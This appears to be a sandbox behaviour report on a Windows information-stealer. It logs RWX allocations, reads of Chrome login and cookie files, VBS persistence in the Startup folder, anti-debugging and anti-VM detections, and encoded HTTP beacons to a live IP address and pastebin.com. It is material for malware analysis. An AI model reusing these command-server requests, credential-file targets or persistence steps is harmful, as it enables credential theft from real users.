allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0078b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00787000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02361000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005bc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00776000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0077a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00777000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005cd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02362000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 28672
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02363000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0236a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02500000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 912
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73e34000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0236b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0236d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005ce000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0236e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0236f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02510000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005cf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 61440
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055a1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04db0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04db1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04db2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04db3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04db4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04db5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04db6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04db7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02511000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04db8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04db9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04dba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04dbd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04dbe000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

total_number_of_free_bytes: 9926053888
free_bytes_available: 9926053888
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 9881772032
free_bytes_available: 9881772032
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Media History
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\LocalPrefs.json
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\History
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\History-journal
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Media History-journal
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\History Provider Cache
file C:\Users\test22\AppData\Local\Temp\82f40ba0-f4f6-4390-a32a-396e70473755.vbs
file C:\Users\test22\AppData\Local\Temp\25210e93-554f-42f6-8135-f54885a014ac.vbs
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstartuped.vbs
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\ZeroAI_History.txt.lnk
file C:\Users\test22\AppData\Local\Temp\82f40ba0-f4f6-4390-a32a-396e70473755.vbs
file C:\Users\test22\AppData\Local\Temp\25210e93-554f-42f6-8135-f54885a014ac.vbs
wmi SELECT * FROM Win32_Process
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\wininit.exe
parameters:
filepath: C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\wininit.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 1158
family: 0
1 0 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
url http://schemas.xmlsoap.org/ws/2005/02/trust/RST/RenewT
url http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTRC/IssueFinal
url http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
url http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/IssueT
url http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/ValidateT
url http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueT
url http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/ValidateFinal
url http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/CancelT
url http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/CancelT
url http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueT
url http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/CancelT
url http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/ValidateT
url http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/ValidateFinalw
url http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/RenewT
url http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/IssueT
url http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Validate
url http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/CancelFinal
url http://schemas.xmlsoap.org/ws/2005/02/trust/RST/CancelT
url http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Validateq
url http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/RenewT
url http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Cancel
url http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Renew
url http://schemas.xmlsoap.org/ws/2005/02/trust/RST/ValidateT
url http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/RenewT
url http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/ValidateT
url http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/RenewFinal
description Escalate priviledges rule Escalate_priviledges
description task schedule rule schtasks_Zero
description PWS Memory rule Generic_PWS_Memory_Zero
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Possibly employs anti-virtualization techniques rule vmdetect
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Escalate priviledges rule Escalate_priviledges
description task schedule rule schtasks_Zero
description PWS Memory rule Generic_PWS_Memory_Zero
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Possibly employs anti-virtualization techniques rule vmdetect
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
host 5.161.143.111
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2072
region_size: 909312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000025c
1 0 0

NtAllocateVirtualMemory

process_identifier: 3012
region_size: 909312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000025c
1 0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
description wininit.exe tried to sleep 5456583 seconds, actually delayed analysis time by 5456583 seconds
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstartuped.vbs
Time & API Arguments Status Return Repeated

send

buffer: •‘d£Øù"¼<5öBˆÔxw?Qš* ù¢`Õ¦N}ii?*</=5 À'ÀÀÀ+À#À,À$À À @2j8>ÿ pastebin.com   
socket: 1596
sent: 154
1 154 0

send

buffer: FBAz¨ö€ßӁ´ ›ç#3d5 e¦ȊX¹u0ÕC°Ÿ""cꮽÌï^BÓ©àý@º¥ ¯Zð/%ôË{×àµS!(ªO×èÔv¶éPÿH¼9á2¢êæy ¼H†ËcÒõ
socket: 1596
sent: 126
1 126 0

send

buffer: ¾ïj)|Ç¿ùBÕ&ÜwŒ_þãõêc__‡Ì+¸«óñô¡GzšéT)a—ï‹DjÞ¯gނ“yøGgy&€YøÓb‰TЃ¥º:vd£ûiE™uØ»S[E«{†ˆkq7 íbÔÉԀÄÚä#¹ IIVd>èÛ|×ç•rV¨øˆòŸ¢…˜m°v›<#µN YŽ,™äüE[Ù·9"Kîþ#}OìDm Oõ öï±
socket: 1596
sent: 195
1 195 0

send

buffer: GET /Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?GIG=klKMNcQkIT8mGtQcqqOlPyC8q&2d245906dee96b5ce3f8d76d9471a15c=547633646c10c545015bf1314b4f8eea&9a96373b97fc1a2b0de79e211da21f57=AOwYzNzATOwQWYjlDNmVDMlljZxczYlZGO1kzMhFGNhJ2Y0E2M3UjZ&GIG=klKMNcQkIT8mGtQcqqOlPyC8q HTTP/1.1 Accept: */* Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 5.161.143.111 Connection: Keep-Alive
socket: 2104
sent: 586
1 586 0

send

buffer: GET /Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&6967395b662dd465398b11d85162f0d3=d1nImRWYjhzMkBDMyEzM0YjMyMGZjNjMhBjN5UDNxATO5YTZlhzNmZmYkJiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W HTTP/1.1 Accept: */* Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 5.161.143.111
socket: 2104
sent: 863
1 863 0

send

buffer: GET /Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&989f9bfdbcf48eb9c6ec71e7025d32af=0VfiIiOiIzMwMGNkFDN5IjNjNGNzQTYyYmZjlTN2IWMyEmZxgTOiwiI5IWM3ADN4ITOxYWOmJzN2cTOjdTNzQGNmNzYzkTYlJ2YmNjZkVDZzIiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W HTTP/1.1 Accept: */* Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 5.161.143.111
socket: 2104
sent: 914
1 914 0

send

buffer: GET /Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&8f099c46b18199a489f2d28eafb098db=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 HTTP/1.1 Accept: */* Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 5.161.143.111
socket: 2104
sent: 2902
1 2902 0

send

buffer: GET /Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&6967395b662dd465398b11d85162f0d3=d1nIzMmY5UDOzQmY4cTNxMTZyUmYjVWNmNzMwUTOhhjZzcjN0IzN0ADO4IiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W&989f9bfdbcf48eb9c6ec71e7025d32af=d1nIiojIyMDMjRDZxQTOyYzYjRzM0EmMmZ2Y5UjNiFjMhZWM4kjIs